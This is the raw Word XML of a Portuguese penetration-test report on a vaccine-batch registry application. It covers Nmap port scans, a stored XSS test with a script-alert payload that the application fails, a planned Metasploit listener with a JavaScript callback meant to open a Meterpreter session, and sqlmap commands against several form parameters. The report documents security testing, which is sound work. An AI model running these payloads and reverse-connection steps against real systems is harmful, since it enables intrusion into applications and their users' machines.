          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>erviços que rodam</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="009C65C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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Pr="00892814" w:rsidRDefault="008C6DC7" w:rsidP="00F52870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EC5D2B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41141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4F40AA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5</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004F40AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Portas TCP escaneadas pelo Nma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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00751591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51591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pptp</w:t>
      </w:r>
      <w:r w:rsidRPr="00751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Protocolo de Tunelamento Ponto a ponto.Utilizado para garantir segurança em redes wireles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51591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ms-wbt-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = serviço de gerenciamento de hosts do window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de portas UD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U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indica o uso do detector de portas UDP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rá quais portas devem ser usadas no teste, o delimitador é “-”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F52870" w:rsidRPr="00F52870" w:rsidRDefault="00F52870" w:rsidP="00F52870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6C2DFF" w:rsidP="00F5287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="008C6DC7" w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se descobrir as portas abertas UDP, os s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>erviços que rodam</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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Pr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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67350" cy="365442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6</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004F40AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Portas UDP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="004F40AA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3.2 XSS – Cadastro L</w:t>
      </w:r>
      <w:r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1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cobrir se os campos da tela de Cadastro Lotes de Vacinas são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0049317F" w:rsidRDefault="0049317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serir em um dos campos o seguinte código:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6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&lt;script&gt; alert(“oi”);&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>no campo Marca/Fabricante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRDefault="00D46C6B" w:rsidP="00D46C6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</w:rPr>
      </w:pP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49317F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Cs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Espera-se que haja um tratamento e esse código não seja executado quando a página carrega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E08B0" w:rsidRDefault="00D46C6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aso a aplicação não realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> devem</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> produzir um pop-up com o texto “oi”.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 w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não passou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. Foi constatado que a aplicação não está fazendo o tratamento adequado para a </w:t>
      </w:r>
      <w:r w:rsidR="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>inserção de códigos mal-</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRDefault="00BC1742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C1742" w:rsidRDefault="00BC1742" w:rsidP="00BC174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998595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BC1742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7</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F248C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado teste XSS</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7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D46C6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  <w:r w:rsidR="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>O esperado é que</w:t>
      </w:r>
      <w:r w:rsidR="00D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> os dados passados sejam devidamente tratados</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> na aplicação para impedir a </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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 utilizado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1. Utilizar o Metasploit para abrir um listener na porta 444 da máquina virtual onde o Kali Linux está hospedado, usando o exploit disponível em Auxiliary/Multi/Handler;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 2. Usar um comando GET de Javascript para abrir a conexão da máquina que hospeda o Sistema de Vacinas com a máquina virtual do Kali na porta indicada</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="cyan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Comando a ser utilizado no XS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exec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AE0F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Caso não haja o devido tratamento, o  listener do Metasploit aberto na porta 444 deve criar uma conexão entre a máquina que </w:t>
      </w:r>
      <w:r w:rsidR="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acessa </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">a aplicação no momento e a máquina onde está o Kali Linux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67E48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8A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no test</w:t>
      </w:r>
      <w:r w:rsidRPr="00751591"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 xml:space="preserve"> A sessão do Meterpreter não foi aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00D46C6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F34CCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Alterar o comando utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tentar descobrir o que impediu a sessão do Meterpreter ser aberta.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D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Que a aplicação realize o tratamento para impedir o comando de ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRP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D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Códig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(!curl_exec($curl)){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>javascript:alert(curl_error($curl)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}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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00BC19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Cs/>
          <w:color w:val="000000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 w:rsidRPr="00F34CCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4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0794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Ao contrário das demais </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s que utilizavam códigos php, aqui foram utilizados códigos de Javascript puro, que os navegadores conseguem ler. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707948" w:rsidRDefault="00707948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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O esperado é que a aplicação </w:t>
      </w:r>
      <w:r w:rsidR="00707948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>realize</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tratamento para impedir o código de ser executado.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script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  <w:r w:rsidR="00707948">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ALIXE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487697">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Independente da sessão do Meterpreter não ser aberta, o</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> código conseguiu ser inserido e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3.4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</w:t>
      </w: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 – Exploração via SQL Injection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22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realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos campos da tela de Cadastro Lotes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scobrir se o campo Marca/Fabricante é vulnerável a SQL Injection através das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: 1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uso de aspas simples aqui é o teste mais básico de vulnerabilidade de um campo para SQL Injection. Imagina-se que haja por baixo uma instrução SQL que possua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here param1 = &lt;parametro_na_interface&gt; and …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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">where param1  = 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.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P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realize o tratamento dos caracteres para impedir que sejam interpretados como</w:t>
      </w:r>
      <w:r w:rsidR="006C08DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> trecho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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando 1‘ no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Marca/Fabricante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000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Sqlmap para realizar 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alvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a parte para ser utilizado pelo Sqlmap posteriormente.[2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sqlmap -r params -p --current-db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arams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current-db” solicita que o Sqlmap que tente descobrir qual o banco da aplicação alvo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</w:t>
      </w:r>
      <w:r w:rsidR="001010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arâmetro</w:t>
      </w:r>
      <w:r w:rsidR="001010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</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O Sqlmap não reconhece o parâmetro, que está no arquivo indicado n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3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2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro solicitado pela ferramen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O comando do Sqlm</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ap pede que seja informado um parâmetro para possível injeção</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de SQL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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: sqlmap -r params -p descricao --current-db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“descrição” é o parâmetro que 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--current-db” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>comando utilizado para</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> descobrir qual o banco da aplicação alvo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lastRenderedPageBreak/>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063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a-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRPr="003A39F6" w:rsidRDefault="00101063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“descricao”</w:t>
      </w:r>
      <w:r w:rsidR="00190AAD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 xml:space="preserve">assou no </w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00101063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00707948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00101063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:r w:rsidR="00707948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para teste de injeção SQL não é injetável conforme mostra a figura 17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noProof/>
          <w:lang w:eastAsia="pt-BR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33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BC174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8</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado aplicação SQL Injection via Sqlmap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4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>s anteriores</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>validad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  <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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Tentar </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">injeção </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>de SQL n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>o parâmetro “validade”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validade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lastRenderedPageBreak/>
        <w:t xml:space="preserve">“validade” é o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">que 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90AAD" w:rsidRP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  <w:r w:rsidR="00101063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> “validade”</w:t>
      </w:r>
      <w:r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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r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190AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“validade” escolhido </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para teste de injeção SQL não é injetável conforme mostra a figura 18.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D0530" w:rsidRDefault="008D0530" w:rsidP="008D053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719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8D0530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9</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>- Resultado exploração Sql Inejction via Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00B71A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5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>s anteriores</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>“vacina”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594AD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vacina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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: sqlmap –r params –p vacina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–r“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0536AA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p”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">“vacina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B71A0F" w:rsidRDefault="00B71A0F" w:rsidP="00B71A0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B71A0F" w:rsidRPr="003A39F6" w:rsidRDefault="00B71A0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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> “vacina”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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B71A0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“vacina” </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injetável conforme mostra a figura 19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D0530" w:rsidRPr="003A39F6" w:rsidRDefault="008D0530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1226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8D0530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0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6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s anteriores </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">para incluir 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cadastro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adastro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 w:rsidRPr="003A39F6">
        <w:rPr>
